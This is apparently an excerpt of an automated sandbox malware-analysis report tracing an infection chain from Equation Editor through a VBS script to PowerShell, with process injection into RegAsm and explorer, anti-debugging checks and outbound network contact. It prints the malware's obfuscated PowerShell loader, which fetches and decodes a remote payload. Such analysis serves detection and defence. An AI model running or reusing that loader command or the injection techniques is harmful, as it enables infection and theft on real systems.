            Source: C:\Windows\SysWOW64\explorer.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_24-890
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI/Special instruction interceptor: Address: 7731C7BA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI/Special instruction interceptor: Address: 7731BFFA
            Source: C:\Users\user\AppData\Roaming\dagifhdMemory allocated: 260000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\dagifhdMemory allocated: 24A0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\dagifhdMemory allocated: 390000 memory reserve | memory write watchJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 22_2_000816C7 GetCurrentProcessId,GetCurrentThreadId,CreateToolhelp32Snapshot,Thread32First,OpenThread,SuspendThread,ResumeThread,CloseHandle,Thread32Next,CloseHandle,22_2_000816C7
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 599704Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Roaming\dagifhdThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 896Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1884Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1575Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3764Jump to behavior
            Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 501Jump to behavior
            Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 614Jump to behavior
            Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 771Jump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 4016Thread sleep time: -120000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2972Thread sleep time: -60000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 976Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2924Thread sleep count: 1575 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2924Thread sleep count: 3764 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2752Thread sleep time: -60000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2460Thread sleep time: -1844674407370954s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2460Thread sleep time: -599704s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2460Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2460Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2668Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\explorer.exe TID: 1892Thread sleep count: 501 > 30Jump to behavior
            Source: C:\Windows\explorer.exe TID: 1892Thread sleep time: -50100s >= -30000sJump to behavior
            Source: C:\Windows\explorer.exe TID: 1960Thread sleep count: 614 > 30Jump to behavior
            Source: C:\Windows\explorer.exe TID: 1040Thread sleep count: 771 > 30Jump to behavior
            Source: C:\Windows\explorer.exe TID: 1040Thread sleep time: -77100s >= -30000sJump to behavior
            Source: C:\Windows\explorer.exe TID: 1344Thread sleep count: 32 > 30Jump to behavior
            Source: C:\Windows\explorer.exe TID: 1340Thread sleep time: -420000s >= -30000sJump to behavior
            Source: C:\Windows\System32\taskeng.exe TID: 2584Thread sleep time: -60000s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\dagifhd TID: 1396Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exe TID: 1928Thread sleep count: 61 > 30
            Source: C:\Windows\SysWOW64\explorer.exe TID: 1928Thread sleep time: -61000s >= -30000s
            Source: C:\Windows\explorer.exe TID: 1036Thread sleep count: 59 > 30
            Source: C:\Windows\explorer.exe TID: 1036Thread sleep time: -59000s >= -30000s
            Source: C:\Windows\SysWOW64\explorer.exe TID: 3184Thread sleep count: 55 > 30
            Source: C:\Windows\SysWOW64\explorer.exe TID: 3184Thread sleep time: -55000s >= -30000s
            Source: C:\Windows\explorer.exe TID: 3220Thread sleep count: 55 > 30
            Source: C:\Windows\explorer.exe TID: 3220Thread sleep time: -55000s >= -30000s
            Source: C:\Windows\SysWOW64\explorer.exe TID: 3404Thread sleep count: 53 > 30
            Source: C:\Windows\SysWOW64\explorer.exe TID: 3404Thread sleep time: -53000s >= -30000s
            Source: C:\Windows\explorer.exe TID: 1236Thread sleep count: 52 > 30
            Source: C:\Windows\explorer.exe TID: 1236Thread sleep time: -52000s >= -30000s
            Source: C:\Windows\explorer.exeLast function: Thread delayed
            Source: C:\Windows\explorer.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
            Source: C:\Windows\explorer.exeLast function: Thread delayed
            Source: C:\Windows\explorer.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
            Source: C:\Windows\explorer.exeLast function: Thread delayed
            Source: C:\Windows\explorer.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
            Source: C:\Windows\explorer.exeLast function: Thread delayed
            Source: C:\Windows\explorer.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_000C1D4A FindFirstFileW,lstrcmpiW,lstrcmpiW,lstrcmpiW,FindNextFileW,FindClose,19_2_000C1D4A
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_000C3ED9 PathCombineW,FindFirstFileW,lstrcmpiW,lstrcmpiW,PathCombineW,lstrcmpiW,PathCombineW,FindNextFileW,FindClose,19_2_000C3ED9
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_000C2B15 FindFirstFileW,lstrcmpiW,lstrcmpiW,StrStrIW,StrStrIW,FindNextFileW,FindClose,19_2_000C2B15
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 21_2_0008255C lstrcatW,PathAppendW,FindFirstFileW,RtlZeroMemory,lstrcatW,PathAppendW,lstrcatW,PathAppendW,StrStrIW,FindNextFileW,FindClose,21_2_0008255C
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 22_2_000815BE RtlZeroMemory,SHGetSpecialFolderPathW,lstrcatW,PathCombineW,FindFirstFileW,lstrcmpiW,lstrcmpiW,lstrcmpiW,PathCombineW,PathMatchSpecW,PathCombineW,FindNextFileW,FindClose,22_2_000815BE
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 22_2_000814D8 wsprintfW,FindFirstFileW,wsprintfW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,22_2_000814D8
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 22_2_000813FE wsprintfW,FindFirstFileW,wsprintfW,RemoveDirectoryW,FindNextFileW,FindClose,22_2_000813FE
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_000C6512 GetSystemInfo,19_2_000C6512
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 599704Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Roaming\dagifhdThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
            Source: explorer.exe, 0000000F.00000002.624600710.00000000001D6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}7
            Source: explorer.exe, 0000000F.00000002.625357590.000000000260D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
            Source: explorer.exe, 0000000F.00000002.625357590.000000000260D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
            Source: explorer.exe, 0000000F.00000002.625742820.0000000003E59000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}eeab7790
            Source: explorer.exe, 0000000F.00000002.625742820.0000000003DB1000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: ide\cdromnecvmwar_vmware_sata_cd01_______________1.00____\6&373888b8&0&1.0.0
            Source: explorer.exe, 0000000F.00000000.464803412.00000000025E0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0a
            Source: explorer.exe, 0000000F.00000002.625742820.0000000003E59000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}100\4&20
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSystem information queried: ModuleInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

            Anti Debugging

            barindex
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSystem information queried: CodeIntegrityInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 22_2_00081E4C CloseHandle,RtlMoveMemory,LoadLibraryA,GetProcAddress,LdrProcessRelocationBlock,22_2_00081E4C
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 22_2_000816C7 GetCurrentProcessId,GetCurrentThreadId,CreateToolhelp32Snapshot,Thread32First,OpenThread,SuspendThread,ResumeThread,CloseHandle,Thread32Next,CloseHandle,22_2_000816C7
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_00129247 LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,19_2_00129247
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_000C1000 GetProcessHeap,RtlAllocateHeap,19_2_000C1000
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\AppData\Roaming\dagifhdMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Windows\explorer.exeFile created: dagifhd.15.drJump to dropped file
            Source: C:\Windows\SysWOW64\explorer.exeNetwork Connect: 185.251.91.119 80Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeDomain query: prolinice.ga
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2984, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2892, type: MEMORYSTR
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread created: C:\Windows\explorer.exe EIP: 2801960Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
            Source: C:\Windows\explorer.exeMemory written: PID: 2852 base: A5102D value: 90Jump to behavior
            Source: C:\Windows\explorer.exeMemory written: PID: 3244 base: FF31B794 value: 90Jump to behavior
            Source: C:\Windows\explorer.exeMemory written: PID: 3340 base: A5102D value: 90Jump to behavior
            Source: C:\Windows\explorer.exeMemory written: PID: 2004 base: A5102D value: 90Jump to behavior
            Source: C:\Windows\explorer.exeMemory written: PID: 1256 base: FF31B794 value: 90Jump to behavior
            Source: C:\Windows\explorer.exeMemory written: PID: 3164 base: A5102D value: 90Jump to behavior
            Source: C:\Windows\explorer.exeMemory written: PID: 3216 base: FF31B794 value: 90Jump to behavior
            Source: C:\Windows\explorer.exeMemory written: PID: 3348 base: A5102D value: 90Jump to behavior
            Source: C:\Windows\explorer.exeMemory written: PID: 2236 base: FF31B794 value: 90Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 7EFDE008Jump to behavior
            Source: C:\Windows\explorer.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: A5102DJump to behavior
            Source: C:\Windows\explorer.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: A5102DJump to behavior
            Source: C:\Windows\explorer.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: A5102DJump to behavior
            Source: C:\Windows\explorer.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: A5102DJump to behavior
            Source: C:\Windows\explorer.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: A5102DJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeCode function: RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,wsprintfA,RtlMoveMemory,CreateToolhelp32Snapshot,Process32First,CharLowerA,lstrcmpi,lstrcmpi,Process32Next,CloseHandle,Sleep, explorer.exe26_2_00081016
            Source: C:\Windows\SysWOW64\explorer.exeCode function: wsprintfA,RtlMoveMemory,CreateToolhelp32Snapshot,Process32First,CharLowerA,lstrcmpi,lstrcmpi,Process32Next,CloseHandle,Sleep, explorer.exe26_2_000810A5
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicebuttersmoothcakeicream.vBs" Jump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? 